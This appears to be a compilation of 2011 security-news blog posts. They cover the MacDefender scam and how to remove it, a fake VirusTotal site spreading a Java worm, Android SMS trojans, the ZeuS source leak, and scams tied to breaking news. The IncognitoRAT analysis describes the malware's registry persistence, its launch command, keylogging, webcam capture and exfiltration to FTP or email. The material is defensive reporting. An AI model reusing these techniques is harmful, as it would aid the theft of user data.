How a poisoned Google Image Search redirects the user to download malware on Mac OSX

A picture says a thousand words. And we’ve got a video this time. So, here’s  is a quick video from Internet security firm F-secure explaining how a poisoned Google Image Search redirects the user to download malware on Mac OSX

Apple provides MacDefender removal tips: will offer software update to automatically remove similar malware

A recent phishing scam has targeted Mac users by redirecting them from legitimate websites to fake websites which tell them that their computer is infected with a virus. The user is then offered Mac Defender “anti-virus” software to solve the issue.

This “anti-virus” software is a malware (i.e. malicious software).  Its ultimate goal is to get the user’s credit card information which may be used for fraudulent purposes.

The most common names for this malware are MacDefender, MacProtector and MacSecurity.

In the coming days, Apple is expected to deliver a Mac OS X software update that will automatically find and remove Mac Defender malware and its known variants.  The update will also help protect users by providing an explicit warning if they download this malware.

In the meantime, the Resolution section below provides step-by-step instructions on how to avoid or manually remove this malware.

If any notifications about viruses or security software appear, quit Safari or any other browser that you are using. If a normal attempt at quitting the browser doesn’t work, then Force Quit the browser.

In some cases, your browser may automatically download and launch the installer for this malicious software.  If this happens, cancel the installation process; do not enter your administrator password.  Delete the installer immediately using the steps below.

1. Go into the Downloads folder or your preferred download location.
2. Drag the installer to the Trash.
3. Empty the Trash.

How to remove this malware

If the malware has been installed, we recommend the following actions:

• Do not provide your credit card information under any circumstances.
• Use the Removal Steps below.

Removal steps

• Move or close the Scan Window
• Go to the Utilities folder in the Applications folder and launch Activity Monitor
• Choose All Processes from the pop up menu in the upper right corner of the window
• Under the Process Name column, look for the name of the app and click to select it; common app names include: MacDefender, MacSecurity or MacProtector
• Click the Quit Process button in the upper left corner of the window and select Quit
• Quit Activity Monitor application
• Open the Applications folder
• Locate the app ex. MacDefender, MacSecurity, MacProtector or other name
• Drag to Trash, and empty Trash

Malware also installs a login item in your account in System Preferences. Removal of the login item is not necessary, but you can remove it by following the steps below.

• Open System Preferences, select Accounts, then Login Items
• Select the name of the app you removed in the steps above ex. MacDefender, MacSecurity, MacProtector
• Click the minus button

Use the steps in the “How to avoid installing this malware” section above to remove the installer from the download location.

Fake virustotal website propagated java worm

Kaspersky Lab Expert Jorge Mieres has revealed the details of a fake website of the popular system analyzes suspicious files Virustotal, by Hispasec company, touted to infect users through a java worm.

The infection strategies using java script technology are on the agenda and that because of his status as a “hybrid”, criminals looking to expand its coverage of attack recruiting infected computers regardless of the browser or operating system you use.

In terms of criminal activities, the techniques of Drive-by-Download by injecting malicious java script in different websites, are a combo of social engineering that requires users to increasingly sharpen the senses of “detection”.

“In the view of users, the website looks same as the original. However, hidden in the source the parameters needed to infect the system through a java applet through which discharge completely silent malware detected by Kaspersky Lab as Worm.MSIL.Arcdoor.ov,” Mieres explained in a blog post.

“The worm is developed to recruit zombies that will be part of a botnet designed primarily to perform DDoS attacks synflood, httpflood, udpflood and icmpflood. The communication focuses on a C&C that stores information obtained from the victim machine,” he revealed.

Mieres said, “Usually these attacks through a centralized hub from which the attacker manages malicious maneuvers using web applications DDoS Framework such as N0ise (used in this case), Cythosia, or NOPE. Such applications have a high impact and demand in terms of development, especially since the European zone of Germany.”

Consumerization of IT has already become a reality for many organizations

Your employees increasingly use their own mobile devices for business– a trend known as the consumerization of IT. Symantec recently conducted a short survey to learn more about end users’ experiences and perspectives on this trend. What it found is the consumerization of IT has already become a reality for many organizations.

The vast majority of respondents said their company allows employees to use the smartphones of their choice for work-related activities. And nearly identical percentages of respondents said their employer provided them with their smartphone (44 percent) as those who said they purchased their own (43 percent).

The survey also found that while end users realize the productivity and satisfaction benefits of allowing employees to use the smartphones of their choice for work, they don’t fully comprehend the extent of the security challenges this creates. In fact, 78 percent think that allowing employees to use the smartphones of their choice either has no impact on or only somewhat decreases the overall security of their company’s networks and information.

So what can small businesses really learn from this survey? Small businesses need to educate employees on the potential security risks these devices create and how to best keep them and the data on and accessible through them protected. Below are tips for small businesses to share with employees to help keep your information safe:

• Encrypt the data on mobile devices – The business-related and even personal information stored on mobile devices is often sensitive. Encrypting this data is a must. If a device is lost and the SIM card stolen, the thief will not be able to access the data if the proper encryption technology is loaded on the device.
• Make sure all software is up-to-date – Mobile devices must be treated just like PCs in that all software on the devices needs to be kept up-to-date, especially the security software. This will protect the device from new variants of malware and viruses that threaten a company’s critical information.
• Develop and enforce strong security policies for using mobile devices – In addition to encryption and security updates, it is important to enforce password management and application download policies for managers and employees. Maintaining strong passwords will help protect the data stored in the phone if a device is lost or hacked.
• Avoid opening unexpected text messages from unknown senders – Just like emails, attackers can use text messages to spread malware, phishing scams and other threats among mobile device users. The same caution should be applied to opening unsolicited text messages that users have become accustomed to with email.
• Click with caution – Just like on stationary PCs, social networking on mobile devices and laptops needs to be conducted with care and caution. Users shouldn’t open unidentified links, chat with unknown people or visit unfamiliar sites. It doesn’t take much for a user to be tricked into compromising a device and the information on it.
• Users should be aware of their surroundings when accessing sensitive information – Whether entering passwords or viewing sensitive or confidential data, users should be cautious of who might be looking over their shoulder.
• Know what to do if a device is lost or stolen – In the case of a loss or theft, employees and management should all know what to do next. Processes to deactivate the device and protect its information from intrusion should all be in place. Products are also available for the automation of such processes, allowing small businesses to breathe easier after such incidents.

New SMS Trojan “zsone” covertly sends premium SMS from Android phones to China

Taiwanese security firm, AegisLab has found that Android apps published by “zsone” were embedded with malicious code segments. The apps, which include iBook, iCartoon, iGuide, iCalendar, LoveBaby and Sea Ball, are embedded with malicious code that covertly sends text messages to three different premium-rate numbers without their knowledge or approval.

At least 11 Android apps contain malware that is rigged to automatically send text messages from your Google Android smartphone to phone numbers in China.

Currently the malicious behavior observed by Aegis only works in China, therefore if your location is in China, it is advisable to check your system and see if any zsone’s apps appear on your device.

Below is the list Aegis found that are published by zsone and are suspicious (iSMS/iLife are not included,  still investigating):

iBook

iCartoon

LoveBaby

3D Cube horror terrible

Sea Ball

iCalendar

iMatch 对对碰

Shake Break

ShakeBanger

iMine

iGuide

Recently Juniper Networks released a report that indicated Android based malware are on a sprawl with a 400% increase in just 6 months.  While Google controls the ‘kill switch’ to remotely wipe any malicious apps that are found on Android phones, it still doesn’t have a mechanism like Apple’s Appstore to scrutinize them for malicious code before they land on the Android Marketplace. In order to restrict the sprawl of such malicious apps, Google needs to take measure to prevent them from being published on the Android Marketplace instead of using the kill switch every time a problem is identified.

Android malware grow 400% in six months

Android OS has shaken up the mobile market in many ways. The Google’s ‘open source’ platform has already overtaken Apple in terms of both mobile market share and in terms of the number of apps in their appstore. However, all is not well with Android. With growing popularity, Android is also becoming a target for malware writers and cyber criminals. According to Juniper Networks’ latest released, samples of malware strains targeting devices running the Android operating system increased 400% between June of 2010 and January of 2011.

“These findings reflect a perfect storm of users who are either uneducated on or disinterested in security, downloading readily available applications from unknown and unvetted sources in the complete absence of mobile device security solutions,” said Dan Hoffman, chief mobile security evangelist at Juniper Networks.

“Mobile malware attacks and other exploits are no longer just theoretical occurrences discussed by security researchers and vendors keen on cashing in on a projected market. The threats to mobile devices are real — and reach far beyond simple viruses to include malware, loss and theft, data communication interception, exploitation and misconduct, and direct attacks. This report details specific attack vectors on mobile devices over the past year, defines new and emerging mobile threats expected in 2011, and gives mobile users practical advice to protect themselves from malicious attacks,” the report abstract states.

The report notes that there needs to be an increase in diligence by those who approve applications for distribution in the marketplace, as well as more proactive security efforts on the part of consumers.

Other key findings in the Juniper report include:

App store anxiety: The single greatest distribution point for mobile malware is application download, yet the vast majority of smartphone users are not employing an antivirus solution on their mobile device to scan for malware.

Wi-Fi worries: Mobile devices are increasingly susceptible to Wi-Fi attacks, including applications that enable an attacker to easily log into victim email and social networking applications.

The text threat: 17 percent of all reported infections were due to SMS trojans that sent SMS messages to premium rate numbers, often at irretrievable cost to the user or enterprise.

Device loss and theft: 1 in 20 Juniper customer devices were lost or stolen, requiring locate, lock or wipe commands to be issued.

Risky teen behavior: 20 percent of all teens admit sending inappropriate or explicit material from a mobile device.

“Droid Distress”: The number of Android malware attacks increased 400 percent since Summer 2010.

“App store processes of reactively removing applications identified as malicious after they have been installed by thousands of users is insufficient as a means to control malware proliferation. There are specifics steps users must take to mitigate mobile attacks. Both enterprises and consumers alike need to be aware of the growing risks associated with the convenience of having the Internet in the palm of your hand,” Hoffman added.

Complete sourcecode of ZeuS botnet leaked to the masses

Center for Strategic and International Studies, CSIS has found that the complete source code for the ZeuS botnet crime kit is being distributed on several underground forums as well as through other channels. CSIS has also collected several addresses from where Zeus source code is being distributed in a compressed zip archive. The company says it has also downloaded, unzipped and compiled the code to confirm its authenticity. Peter Kruse, Partner & Security Specialist, CSIS says, “We can hereby confirm that the complete ZeuS/Zbot source code is freely available for inspection, inspiration or perhaps to be compiled and used in future attacks. ”

ZeuS/Zbot is already considered as being amongst the most pervasive banking Trojan in the global threat landscape. It is an advanced crime kit and very configurable. With the release and leakage of the source code the ZeuS/Zbot could easily become even more widespread and an even bigger threat than it already is today.

The source code would greatly help security companies analyze how this advanced botnet really works and this could mark a breakthrough for the industry, which is struggling to keep pace with the highly advanced malware being developed, which are increasingly difficult to detect. However, this would also give other malware writers a head-start for advanced virus and botnet writing.

Java-based Trojan, IncognitoRAT targets both Windows as well as Mac

Most of today’s malware work on Windows and its apps, because it can affect a lot of people around the world (considering over 90% market share of windows in the consumer operating system space). However, other platforms are becoming more popular every day and attracting bad guys who are starting to create malicious code for other systems.

According to McAfee, a further threat is cross-platform malware that can execute on Windows and Mac using Java; this type of malware can run in a multiplatform Java Virtual Machine. IncognitoRAT is one example of a Java-based Trojan discovered in the wild that is being downloaded and installed by another component. This malware behaves like other Windows botnets but uses source code and libraries that can operate on other platforms.

“The original propagation vector of IncognitoRAT is a Windows executable, but apparently it was created using the tool JarToExe, which includes, among other features, the ability to convert .jar files into .exe files, to add program icons and version information, and protect and encrypt Java programs. The victim’s machine has to have the Java Runtime Environment installed and must be online,” explains Carlos Castillo, Malware researcher, McAfee. As soon as the file is executed, it starts downloading a ZIP file with a pack of Java-based libraries to perform several remote activities:

• Java Registry Wrapper: Used to access the Windows Registry and create an entry in Software\Microsoft\Windows\CurrentVersion\Run to execute the malware every time the computer starts
• Java Remote Control: To view and take remote control (keyboard and mouse) of an infected machine
• JLayer – MP3 Library: To remotely play an MP3 file on the infected machine
• RNP-VideoPlayer: To play videos remotely
• JavaMail: Optional Java package to send stolen information to an email account
• Freedom for Media Java: Open-source alternative to the official Java Media Framework; used by the malware to watch and record images from a remote webcam

In additional to those libraries, the downloader drops the following .jar components:

• JavaUpdater.jar: Decrypts the directory (full path) that will be created by the malware to place all the components on the infected machine. It implements TripleDES encryption and decryption methods. Finally, the component executes the principal malware, server.jar, using the common instructions to run Java applications in Windows (java -jar %malwarepath%/Server.jar).
• Server.jar: Runs in the background collecting keystrokes using a DLL designed to hook the keyboard on the infected machine. Also waits for commands sent from the control server to use the libraries described above and perform other actions, such as sending the captured keystrokes in a text file to an FTP server or an email account, viewing and recording the remote webcam, performing distributed denial –of-service attacks, taking remote control of the machine, etc.

One interesting feature of this botnet that we could not replicate during our analysis is its ability to “crash” the system. Apparently, it is a fake crash because in the dropped files we found a curious image that may appear on the infected machine:

Osama Bin Laden dead but new malware born

Google’s top-trending Anglophone search term right now is, understandably, “osama bin laden dead”.

Google officially describes its hotness (you couldn’t make this stuff up) as volcanic.

According to President Obama’s statement, “On Sunday, a ‘small team’ of Americans raided the compound. After a firefight, they killed Bin Laden. Apparently, DNA tests have confirmed Bin Laden’s identity.”

Now you know the basics – but watch out for the links you’re likely to come across in email or on social networking sites offering you additional coverage of this newsworthy event.

“Many of the links you see will be perfectly legitimate links. But at least some are almost certain to be dodgy links, deliberately distributed to trick you into hostile internet territory. If in doubt, leave it out!” warns Paul Ducklin, Sophos’s Head of Technology, Asia Pacific.

Sometimes, poisoned content is rather obvious. The links in the spam below give the impression of going to a news site:

The links don’t go anywhere of the sort, of course. Wherever you click, you end up finding out how to replace your tired old windows:

But even well-meant searches using your favorite search engine might end in tears. What’s commonly called “Black-Hat Search Engine Optimisation” (BH-SEO) means that cybercrooks can often trick the secret search-ranking algorithms of popular search engines by feeding them fake pages to make their rotten content seem legitimate, and to trick you into visiting pages which have your worst interests at heart.

Well-known topics that have been widely written about for years are hard to poison via BH-SEO. The search engines have a good historical sense of which sites are likely to be genuinely relevant if your interest is searches like “Commonwealth of Australia”, “Canadian Pacific Railway” or “Early history of spam”.

But a search term which is incredibly popular but by its very nature brand new – “Japanese tsunami”, “William and Kate engagement”, “Kate Middleton wedding dress” or, of course “Osama bin Laden dead” – doesn’t give the search engines much historical evidence to go on.

Of course, the search engines want to be known for being highly responsive to new trends – that means more advertising revenue for them, after all – and that means, loosely speaking, that they have to take more of a chance on accuracy.

What can you do to keep safe?

* Don’t blindly trust links you see online, whether in emails, on social networking sites, or from searches. If the URL and the subject matter don’t tie up in some obvious way, give it a miss.

* Use an endpoint security product which offers some sort of web filtering so you get early warning of poisoned content.

* If you go to a site expecting to see information on a specific topic but get redirected somewhere unexpected – to a “click here for a free security scan” page, for instance, or to a survey site, or to a “download this codec program to view the video” dialog – then get out of there at once. Don’t click further. You’re being scammed.

How to avoid scams and malware during the Royal Wedding

There are few non-sporting events that draw as much attention from all over the world as the wedding of an heir to the British monarchy. When Prince Charles married Diana, television told the story. For the marriage of Prince William and Kate Middleton, the Internet will not only broadcast the images it will also allow us to engage in a global conversation in real-time.

Until the ceremony takes place on April 29 and for a few days after, you’ll probably see the word “wedding” more often than an avid reader of Jane Austen does. Most of the headlines and links featuring “the wedding” will lead to legitimate sites—but some will invariably lead to a variety of scams and malware. This is true when celebrities die, when disaster strikes and you can expect the same when Catherine says “I do” to William.

If you’re actively avoiding the wedding, you’ll avoid most of the risks. But for you royal watchers out there, here are a few tips for avoiding digital wedding crashers from F-Secure:

1. Follow the official site, Twitter, Facebook, Flickr and YouTube pages.

• http://www.officialroyalwedding2011.org/
• http://twitter.com/clarencehouse
• https://www.facebook.com/TheBritishMonarchy
• http://www.flickr.com/photos/britishmonarchy/
• http://www.youtube.com/user/TheRoyalChannel

These official sources are going your safest sources of information. Of course, users can post links in the comments. So avoid links users post unless you trust the domain being linked.

2. Search for Royal Wedding news using Google and Bing’s News Filters.
Google has recently changed its algorithm to deliver safer, higher quality results. However, during breaking news rogue sites use the dark arts of search engine optimization to zoom up search results. This doesn’t happen, however, in Google and Bing’s news sites. Why? The news sites listed there have all been vetted and verified. Click on news, if it is available in your area, and click without worry.

3. Make sure your PC is patched and protected.
Every month, at least, Microsoft, Apple, Adobe and the world’s biggest software makers release updates to their products that plug security holes. These updates are often crucial for your online safety.